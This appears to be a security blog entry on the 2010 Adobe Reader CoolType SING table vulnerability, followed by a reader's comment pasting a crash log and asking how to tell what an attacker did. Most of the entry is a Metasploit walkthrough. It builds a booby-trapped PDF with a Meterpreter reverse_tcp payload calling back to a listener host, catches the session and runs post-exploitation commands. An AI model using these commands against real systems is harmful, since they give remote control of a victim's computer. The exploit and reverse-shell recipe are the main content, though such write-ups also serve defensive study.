Timeline :
Vulnerability exploited in the wild and discovered by Mila Parkour the 2010-09-06
Metasploit PoC provided the 2010-09-08
PoC provided by :
sn0wfl0w
vicheck
jduck
Reference(s) :
Affected version(s) :
Adobe Reader 9.3.4 and previous versions for Windows, Macintosh and UNIX.
Adobe Acrobat 9.3.4 and previous versions for Windows and Macintosh.
Tested on Windows XP SP3 with :
Adobe Reader 9.3.4
Description :
This module exploits a vulnerability in the Smart INdependent Glyplets (SING) table handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior version are assumed to be vulnerable as well.
Commands :
use exploit/windows/fileformat/adobe_cooltype_sing
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploituse exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -jsessions -i 1
sysinfo
getuid
ipconfig
Hi,
I think my computer has been attacked with this exploit because i have next event log in my Windows:
Nombre de la aplicación con errores: firefox.exe versión: 1.9.2.4095 marca de tiempo: 0x4d852c95^`Nombre del módulo con errores: icucnv36.dll versión: 3.6.0.0 marca de tiempo: 0x470eff71^`Código de excepción: 0xc0000005^`Desplazamiento de errores: 0x0002a715^`Id. del proceso con errores: 0x708^`Hora de inicio de la aplicación con errores: 0x01cc72607c30096a^`Ruta de acceso de la aplicación con errores: C:\Program Files\Mozilla Firefox\firefox.exe^`Ruta de acceso del módulo con errores: C:\Program Files\Adobe\Reader 9.0\Reader\icucnv36.dll^`Id. del informe: ef27a56c-de56-11e0-bc54-000c29b8c4af
How can i know what the attacker did? In other words, how can i know what command to run after the attacker exploit this vulnerability?
Thanks.
Regards.